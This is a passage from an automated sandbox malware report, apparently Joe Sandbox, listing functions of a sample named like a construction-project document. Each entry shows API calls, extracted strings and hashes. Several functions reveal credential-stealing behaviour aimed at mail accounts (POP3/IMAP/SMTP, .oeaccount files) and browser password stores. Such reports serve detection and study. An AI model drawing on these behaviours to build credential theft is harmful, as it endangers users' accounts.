                                                                                                                          • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                          • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                                                          • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                          • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                                                          Function 004072D6 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                                          • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                                          • GetDC.USER32(00000000), ref: 004072FB
                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                                                          • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                                                          • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                                          • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                                          • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1999381814-0
                                                                                                                          • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                          • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                                                          • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                          • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                                                          Function 004261F7 Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 443COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpymemset
                                                                                                                          • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                                          • API String ID: 1297977491-3883738016
                                                                                                                          • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                          • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                                                          • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                          • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                                                          Function 0041230B Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 187COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __aulldvrm$__aullrem
                                                                                                                          • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                                                          • API String ID: 643879872-978417875
                                                                                                                          • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                                          • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                                                                          • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                                          • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                                                                          Function 004080ED Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040810E
                                                                                                                            • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                            • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                            • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                            • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                                                          • LocalFree.KERNEL32(?,?,?,?,?,00000000,75A8EB20,?), ref: 004081B9
                                                                                                                            • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                            • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                            • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                                          • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                          • API String ID: 524865279-2190619648
                                                                                                                          • Opcode ID: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                                                          • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                                                          • Opcode Fuzzy Hash: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                                                          • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                                                          Function 004093B2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                          • String ID: 0$6
                                                                                                                          • API String ID: 2300387033-3849865405
                                                                                                                          • Opcode ID: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                                                          • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                                                          • Opcode Fuzzy Hash: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                                                          • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                                                          Function 004073EF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _mbscat$memsetsprintf
                                                                                                                          • String ID: %2.2X
                                                                                                                          • API String ID: 125969286-791839006
                                                                                                                          • Opcode ID: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                                                                                          • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                                                          • Opcode Fuzzy Hash: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                                                                                          • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                                                          Function 00444196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                                            • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                                            • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                                            • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                                            • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                            • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                                            • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                            • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                          • String ID: ACD
                                                                                                                          • API String ID: 1886237854-620537770
                                                                                                                          • Opcode ID: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                                                                                          • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                                                          • Opcode Fuzzy Hash: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                                                                                          • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                                                          Function 004091C1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 004091EC
                                                                                                                          • sprintf.MSVCRT ref: 00409201
                                                                                                                            • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                                            • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                            • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                                          • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                                          • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                                          • String ID: caption$dialog_%d
                                                                                                                          • API String ID: 2923679083-4161923789
                                                                                                                          • Opcode ID: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                                                                                          • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                                                          • Opcode Fuzzy Hash: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                                                                                          • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                                                          Function 004101AF Relevance: 9.1, APIs: 6, Instructions: 143COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040FE66,00000000,00000000), ref: 004101E6
                                                                                                                          • memset.MSVCRT ref: 00410246
                                                                                                                          • memset.MSVCRT ref: 00410258
                                                                                                                            • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                          • memset.MSVCRT ref: 0041033F
                                                                                                                          • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                                                          • CloseHandle.KERNEL32(00000000,0040FE66,?), ref: 004103AE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3974772901-0
                                                                                                                          • Opcode ID: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                                                          • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                                                          • Opcode Fuzzy Hash: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                                                          • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                                                          Function 00444059 Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • wcslen.MSVCRT ref: 0044406C
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                                          • strlen.MSVCRT ref: 004440D1
                                                                                                                            • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                                            • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                                                                          • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 577244452-0
                                                                                                                          • Opcode ID: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                                                          • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                                          • Opcode Fuzzy Hash: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                                                          • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                                          Function 00404487 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 75COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                            • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                          • _strcmpi.MSVCRT ref: 00404518
                                                                                                                          • _strcmpi.MSVCRT ref: 00404536
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _strcmpi$memcpystrlen
                                                                                                                          • String ID: imap$pop3$smtp
                                                                                                                          • API String ID: 2025310588-821077329
                                                                                                                          • Opcode ID: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                                                          • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                                          • Opcode Fuzzy Hash: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                                                          • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                                          Function 0040C00D Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040C02D
                                                                                                                            • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                                                            • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,74DF0A60), ref: 00408EBE
                                                                                                                            • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,74DF0A60), ref: 00408E31
                                                                                                                            • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                            • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                                            • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                                            • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                                            • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                            • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                                            • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                            • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                          • API String ID: 2726666094-3614832568
                                                                                                                          • Opcode ID: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                                                          • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                                          • Opcode Fuzzy Hash: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                                                          • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                                          Function 0040C143 Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                                          • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                                          • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                                          • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                                          • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2014771361-0
                                                                                                                          • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                          • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                                                          • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                          • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                                                          Function 0040613B Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 51COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                                                                            • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                                                                            • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                                            • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                                                          • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                                                                          • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                                                                          • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
